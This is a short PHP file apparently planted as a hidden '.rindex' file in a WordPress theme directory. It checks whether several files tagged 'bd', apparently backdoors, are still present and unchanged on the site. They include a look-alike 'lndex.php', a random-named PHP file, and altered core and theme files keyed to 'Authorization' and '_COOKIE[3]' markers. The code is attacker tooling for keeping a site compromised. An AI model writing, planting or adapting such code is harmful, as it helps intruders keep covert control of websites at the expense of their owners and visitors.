File: /home/samfetchero1/pacificnorthwestcoastbias.com/wp-content/themes/twentythirteen/.rindex
<?php $r = '/home/samfetchero1/pacificnorthwestcoastbias.com'; $x = ["/wp-includes/widgets/class-wp-widget-recent-comments.php"=>"bd@@207561@@Authorization",
"/wp-content/themes/twentythirteen/content-audio.php"=>"bd@@378160@@_COOKIE[3]",
"/wp-content/themes/bottom-1757679671/lndex.php"=>"bd@@451514@@727",
"/4863b6.php"=>"bd@@23525@@105"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');